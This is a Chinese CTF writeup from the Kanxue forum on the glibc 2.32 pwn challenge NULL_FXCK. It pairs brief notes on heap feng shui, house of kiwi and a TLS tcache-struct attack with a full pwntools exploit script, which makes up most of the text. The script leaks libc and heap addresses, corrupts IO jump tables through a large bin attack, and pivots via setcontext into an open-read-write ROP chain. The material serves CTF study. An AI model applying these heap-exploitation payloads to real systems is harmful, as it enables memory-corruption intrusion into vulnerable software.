其他
从PWN题NULL_FXCK中学到的glibc知识
本文为看雪论坛精华文章
看雪论坛作者ID:Nameless_a
版本:
沙箱:
保护:
ida
思路
堆风水泄露libc和堆地址。
记另一个堆块为N
fwd=N->fd;
bck=N->bk;
if(fwd->bk != N || bck->fd !=N) exit(-1);
fwd->bk=bck;
bck->fd=fwd;
我们发现，切割 2 和 3 合并后的堆块时会剩下一个堆块，我们记作 L。L 的地址和 3 离得很近，可能只是低两位不同。如果 3 的低两位是 '\x00'，我们就通过将 L 和 0 放入 unsorted bin 来设置 bk 指针。
house of kiwi
......
assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
......
TLS段tcache struct attack
总结
exp
from pwn import *
from hashlib import sha256
import base64
# pwntools tube settings for this solve script: amd64 Linux target, with
# full I/O tracing enabled (every byte sent to / received from the target
# is echoed to the log).
context.update(arch='amd64', os='linux', log_level='debug')
def proof_of_work(sh):
    """Answer the challenge server's SHA-256 proof-of-work gate on tube ``sh``.

    Reads the hex digest that follows " == ", searches for the 4-character
    alphanumeric preimage with pwntools' ``mbruteforce`` and sends it back
    after the "input your ????>" prompt.  Not called anywhere in this
    script (``exp`` runs the binary locally); presumably kept for the
    remote target.
    NOTE(review): the prompt format is assumed from the challenge; verify
    against the live service.
    """
    sh.recvuntil(" == ")
    target_digest = sh.recvline().strip().decode("utf8")

    def matches(candidate):
        # True when the candidate's hex SHA-256 equals the server's digest.
        return sha256(candidate.encode()).hexdigest() == target_digest

    alphabet = string.ascii_letters + string.digits
    answer = mbruteforce(matches, alphabet, length=4, method='fixed')
    sh.sendlineafter("input your ????>", answer)
##r=remote("123.57.69.203",7010)
##r=process('./sp1',env={"LD_PRELODA":"./libc-2.27.so"})
##mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
def z():
    """Debug helper: attach gdb to the module-level target tube ``r``."""
    gdb.attach(r)
def cho(num):
    """Pick a menu entry: wait for the ">> " prompt and send ``num`` as text (no newline)."""
    menu_prompt = ">> "
    r.sendafter(menu_prompt, str(num))
def add(size, content='\x00'):
    """Menu option 1 (allocate).

    Sends ``size`` after the "Size: " prompt and the raw ``content`` after
    "Content: ".  ``content`` goes out via ``sendafter`` (no trailing
    newline), so the caller controls the exact bytes written.
    """
    cho(1)
    size_prompt, content_prompt = "Size: ", "Content: "
    r.sendlineafter(size_prompt, str(size))
    r.sendafter(content_prompt, content)
def edit(idx, con):
    """Menu option 2 (edit): overwrite entry ``idx`` with the raw bytes ``con``.

    The index is sent with a newline; ``con`` is sent as-is.
    """
    cho(2)
    prompts = {"index": "Index: ", "content": "Content: "}
    r.sendlineafter(prompts["index"], str(idx))
    r.sendafter(prompts["content"], con)
def show(idx):
    """Menu option 4 (show): request the contents of entry ``idx``.

    Only sends the request; the caller reads the reply from ``r``.
    """
    cho(4)
    index_prompt = "Index: "
    r.sendlineafter(index_prompt, str(idx))
def delet(idx):
    """Menu option 3 (delete): free entry ``idx``."""
    cho(3)
    index_prompt = "Index: "
    r.sendlineafter(index_prompt, str(idx))
def exp():
    """Run the solve sequence for the challenge described in the writeup.

    Spawns './main' locally, drives its menu through the helpers (add /
    edit / show / delet) in the order given below, and prints the flag read
    back from the process.  Every numeric offset is hard-coded against the
    bundled './libc-2.32.so' and the process's own heap layout; none of
    them is portable to another build.
    NOTE(review): the payloads concatenate str literals with p64() output
    and call .ljust(8, '\\x00') on recv() data, which only works under
    Python 2 / a py2 pwntools (bytes + str raises TypeError on Python 3).
    """
    global r
    global libc
    libc=ELF('./libc-2.32.so')
    r=process('./main')
    ##[+]: fengshui 2 leak
    add(0x418) #0
    add(0x1f8) #1
    add(0x428) #2
    add(0x438) #3
    add(0x208) #4
    add(0x428) #5
    add(0x208) #6
    delet(0)
    delet(3)
    delet(5)
    delet(2)
    ##z()
    add(0x440,0x428*'a'+p64(0xc91)) #0
    add(0x418) #3 0x2b0
    add(0x418) #2
    add(0x428) #5 0x370
    ##z()
    delet(3)
    delet(2)
    ##z()
    add(0x418,'a'*9) #2
    add(0x418) #3
    delet(3)
    delet(5)
    add(0x9f8) #3
    ##z()
    add(0x428,'a') #5
    edit(6,0x200*'a'+p64(0xc90)+'\x00')
    add(0x418) #7
    ##z()
    add(0x208) #8
    ##z()
    delet(3)
    add(0x430,flat(0,0,0,p64(0x421))) #3
    add(0x1600) #9
    ##z()
    # Two 6-byte reads are zero-extended to 8 bytes; the subtracted
    # constants are offsets specific to this libc build / heap layout.
    show(4)
    libcbase=u64(r.recv(6).ljust(8,'\x00'))-0x1e4230
    log.success('libcbase:'+hex(libcbase))
    show(5)
    heap=u64(r.recv(6).ljust(8,'\x00'))-0x2b0
    log.success('heap:'+hex(heap))
    ##[+]: set libc func
    # Symbol-based addresses come from libc.sym; the raw hex offsets below
    # were taken from this exact libc-2.32.so and must be re-derived for
    # any other build.
    IO_file_jumps=0x1e54c0+libcbase
    IO_helper_jumps=0x1e48c0+libcbase
    setcontext=libcbase+libc.sym['setcontext']
    open_addr=libcbase+libc.sym['open']
    read_addr=libcbase+libc.sym['read']
    puts_addr=libcbase+libc.sym['puts']
    pop_rdi_ret=libcbase+0x2858f
    pop_rsi_ret=libcbase+0x2ac3f
    pop_rdx_pop_rbx_ret=libcbase+0x1597d6
    ret=libcbase+0x26699
    ##[+]: large bin attack to reset TLS
    ##z()
    ##edit(4,p64(libcbase+0x1e4230)+)
    ##[+]: orw
    target=heap+0x8e0
    flag_addr = heap + 0x8e0 + 0x100
    chain = flat(
        pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
        pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
        pop_rdi_ret , flag_addr , puts_addr
    ).ljust(0x100,'\x00') + 'flag\x00'
    TLS=libcbase-0x2908
    add(0x1240,0x208*'a'+p64(0x431)+0x428*'a'+p64(0x211)+0x208*'a'+p64(0xa01))
    delet(0)
    add(0x440,chain)
    ##z()
    add(0x418) #11
    add(0x208) #12
    delet(5)
    delet(4)
    add(0x1240,0x208*'a'+p64(0x431)+p64(libcbase+0x1e3ff0)*2+p64(heap+0x1350)+p64(TLS-0x20))#4
    delet(11)
    ##z()
    add(0x500)
    ##z()
    add(0x410)
    delet(4)
    add(0x1240,0x208*'a'+p64(0x431)+p64(libcbase+0x1e3ff0)*2+p64(heap+0x1350)*2)
    pd='\x01'*0x70
    pd=pd.ljust(0xe8,'\x00')+p64(IO_file_jumps+0x60)
    pd=pd.ljust(0x168,'\x00')+p64(IO_helper_jumps+0xa0)+p64(heap+0x46f0)
    add(0x420,pd) #13
    add(0x100,p64(setcontext+61))
    add(0x200,p64(target)+p64(ret))
    add(0x210,p64(0)+p64(0x910))
    # NOTE(review): unconditional debugger attach left in the final script
    # (every other z() call is commented out); presumably a debugging
    # leftover — the run will stop here if gdb is not available.
    z()
    add(0x1000)
    ##z()
    r.recvuntil('flag')
    # The local name `string` shadows the stdlib module used by
    # proof_of_work; harmless inside this function but confusing.
    string=r.recvuntil('}')
    flag='flag'+string
    print(flag)
    show(5)
    r.interactive()
# Script entry point: run the solve routine only when executed directly.
if __name__ == '__main__':
    exp()
##setcontext and orw
# NOTE(review): the quoted block below is a bare string-literal statement
# (note the opening ''''), so it is evaluated and discarded, never run.
# It references names (r4, r1, r2, r3, free_hook, syscall, mem, gold_key)
# that are not defined anywhere in this script, so it reads as a leftover
# snippet from a different challenge and could be deleted.
''''
orw=p64(r4)+p64(2)+p64(r1)+p64(free_hook+0x28)+p64(syscall)
orw+=p64(r4)+p64(0)+p64(r1)+p64(3)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
orw+=p64(r4)+p64(1)+p64(r1)+p64(1)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
orw+=p64(0xdeadbeef)
pd=p64(gold_key)+p64(free_hook)
pd=pd.ljust(0x20,'\x00')+p64(setcontext+61)+'./flag\x00'
pd=pd.ljust(0xa0,'\x00')+p64(free_hook+0xb0)+orw
r.sendafter(">>",pd)
flag=r.recvline()
'''
看雪ID:Nameless_a
https://bbs.pediy.com/user-home-943085.htm